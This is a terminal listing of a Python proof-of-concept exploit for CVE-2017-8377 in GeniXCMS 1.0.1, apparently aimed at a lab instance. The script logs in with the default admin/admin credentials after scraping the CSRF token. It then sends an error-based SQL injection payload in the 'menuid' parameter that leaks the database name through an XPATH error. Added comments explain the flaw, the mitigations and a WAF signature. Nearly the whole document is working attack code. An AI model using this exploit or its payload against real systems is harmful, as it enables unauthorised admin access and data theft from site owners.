c@kali:~/src$ cat GeniXCMS-CVE-2017-8377.py
#!/usr/bin/env python
# sweet and dirty poc for CVE-2017-8377
# poc by code16 @ 24.07.2017
#
import requests
import re
# Base URL of the lab instance under test, written WITH a trailing slash.
# main() below appends "/gxadmin/index.php?...", so the final request URL
# contains a double slash; main() also hard-codes the login URL separately
# instead of deriving it from this value, so the two must be kept in sync.
target = 'http://192.168.56.102/genix/GeniXCMS-v1.0.1/'  # login page lives under gxadmin/login.php
##
def main():
    """Drive the CVE-2017-8377 proof of concept against ``target``.

    Steps, as visible in the body: fetch the admin login page and read its
    hidden CSRF token, log in with the hard-coded default credentials, then
    request the menu-removal page with a ``menuid`` value that makes the
    database raise an error whose text (matched by a regex below) carries
    the database name.  Uses Python 2 ``print`` statement syntax.  Reads
    the module-level ``target``; returns nothing and prints progress lines.
    """
    # NOTE(review): the nesting of the three ``if`` bodies is reconstructed
    # from a flattened listing -- confirm against the original file.
    print "[+] Checking:", target
    session = requests.session()
    # Login URL is spelled out here rather than built from ``target``.
    sesslink = 'http://192.168.56.102/genix/GeniXCMS-v1.0.1/gxadmin/login.php'
    # The login form embeds an anti-CSRF token in a hidden input; the POST
    # below has to carry it, so fetch the page first and regex it out.
    getToken = session.get(sesslink)
    sessResp = getToken.text
    token_find = re.compile('input type="hidden" name="token" value="(.*?)"')
    token_found = re.search(token_find, sessResp)
    if token_found:
        got_token = token_found.group(1)
        print '[+] Found token!'  # the token value itself is not printed
        print '[+] Log me now..'
        # Default install credentials; the PoC assumes they were never changed.
        data_login = {
            'username':'admin',
            'password':'admin',
            'token':got_token,
            'login':''
        }
        login_link = sesslink # same
        doLogin = session.post(login_link, data=data_login)
        loginResp = doLogin.text
        # The only success check is the word 'Dashboard' appearing in the
        # response body; any other outcome ends the script silently.
        if 'Dashboard' in loginResp:
            print '[+] We are admin now. Exploiting...'
            # last req with payload:
            # ``menuid`` is the parameter that reaches the vulnerable query
            # (server side not shown here).  ``target`` already ends in '/',
            # so the URL built here contains '//gxadmin/'.
            exp_link = target + "/gxadmin/index.php?page=menus&token=" + got_token
            exp_link += "&act=remove&menuid=test'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'"
            lastreq = session.get(exp_link)
            lastresp = lastreq.text
            # The leak works only because the page echoes the raw MySQL error
            # text ("Query failed: XPATH syntax error: ...") into the HTML.
            # Mitigation on the application side is a parameterised query for
            # ``menuid`` and not rendering database error messages to users;
            # the extractvalue()/inline-comment pattern in the query string is
            # also an easy signature for request logging or a WAF rule.
            find_summary = re.compile("Query failed: XPATH syntax error: (.*?)<br />")
            found_summary = re.search(find_summary, lastresp)
            if found_summary:
                print '[+] DB name is:',found_summary.group(1)
## main:
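# Entry point guard so importing this module does not fire the requests;
# running the file directly behaves exactly as before.
if __name__ == "__main__":
    main()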